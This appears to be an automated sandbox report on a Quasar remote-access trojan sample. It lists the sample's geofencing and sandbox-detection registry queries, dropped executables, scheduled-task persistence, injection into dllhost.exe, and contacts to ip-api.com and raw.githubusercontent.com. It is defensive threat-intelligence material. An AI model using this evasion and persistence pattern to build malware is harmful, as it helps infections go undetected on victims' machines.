quasar | 98bbe270ca87c08856cc3dceafef76824baa96fe031d7f00f0517b2fd898e117

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	$srr-powershell.exe

Executes dropped EXE 15 IoCs

Processes:

$srr-powershell.exeinstall.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe

pid	process
4788	$srr-powershell.exe
4592	install.exe
2012	$srr-powershell.exe
3568	$srr-powershell.exe
3212	$srr-powershell.exe
3300	$srr-powershell.exe
972	$srr-powershell.exe
2468	$srr-powershell.exe
1056	$srr-powershell.exe
4216	$srr-powershell.exe
3344	$srr-powershell.exe
212	$srr-powershell.exe
2516	$srr-powershell.exe
2780	$srr-powershell.exe
2556	$srr-powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

25 raw.githubusercontent.com
26 raw.githubusercontent.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

21 ip-api.com
57 ip-api.com
70 ip-api.com

flow	ioc
25	raw.githubusercontent.com
26	raw.githubusercontent.com

flow	ioc
21	ip-api.com
57	ip-api.com
70	ip-api.com

Drops file in System32 directory 37 IoCs

Processes:

R0X-Built.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exesvchost.exesvchost.exe$srr-powershell.exe$srr-powershell.exepowershell.EXE$srr-powershell.exe$srr-powershell.exe$srr-powershell.exe$srr-powershell.exesvchost.exe$srr-powershell.exe$srr-powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	R0X-Built.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\System32\Tasks\$srr-powershell	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	R0X-Built.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\SysWOW64\Windows\$srr-powershell.exe	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe
File opened for modification	C:\Windows\SysWOW64\Windows	$srr-powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1964 set thread context of 3876 1964 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 1964 set thread context of 3876	1964	powershell.EXE	dllhost.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

wmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

SCHTASKS.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
5016	SCHTASKS.exe
4888	schtasks.exe
2376	schtasks.exe
4080	schtasks.exe
2632	schtasks.exe
1440	schtasks.exe
1488	schtasks.exe
4036	schtasks.exe
2952	schtasks.exe
4952	schtasks.exe
1456	schtasks.exe
636	schtasks.exe
2336	schtasks.exe
2908	schtasks.exe
1480	schtasks.exe
452	schtasks.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 53 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715322572"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe

Modifies registry class 16 IoCs

Processes:

RuntimeBroker.exeRuntimeBroker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2a3de027-de23-44ff-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = 3f1abd36a3a2da01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "\\\\?\\Volume{A968B372-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\fd38823f3e602e0e5bcf38e1ce8ed239fbe14051a904705600876d41cdb35e20"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000029db8c35a3a2da01d9e45936a3a2da01d9e45936a3a2da019c0400000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000aa5881332000666433383832336633653630326530653562636633386531636538656432333966626531343035316139303437303536303038373664343163646233356532300000b20009000400efbeaa588133aa5881332e0000000000000000000000000000000000000000000000000089905f00660064003300380038003200330066003300650036003000320065003000650035006200630066003300380065003100630065003800650064003200330039006600620065003100340030003500310061003900300034003700300035003600300030003800370036006400340031006300640062003300350065003200300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000f5afbf871000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c66643338383233663365363032653065356263663338653163653865643233396662653134303531613930343730353630303837366434316364623335653230000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000072696a746f6f7678000000000000000072e9330fb5301f4a9e010962a32a67ec039592532d0def11a084c2748a3a93ce72e9330fb5301f4a9e010962a32a67ec039592532d0def11a084c2748a3a93cece000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003800300034003100350030003900330037002d0032003100340036003700300038003400300031002d003400310039003000390035003000370031002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000072b368a9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7-	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\72a514ad-517e-46e7-	RuntimeBroker.exe

Runs ping.exe 1 TTPs 14 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
4644	PING.EXE
1420	PING.EXE
4564	PING.EXE
972	PING.EXE
3604	PING.EXE
2084	PING.EXE
2540	PING.EXE
3360	PING.EXE
4392	PING.EXE
4508	PING.EXE
3100	PING.EXE
1988	PING.EXE
3208	PING.EXE
4732	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEdllhost.exe

pid	process
1964	powershell.EXE
1964	powershell.EXE
1964	powershell.EXE
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
3876	dllhost.exe
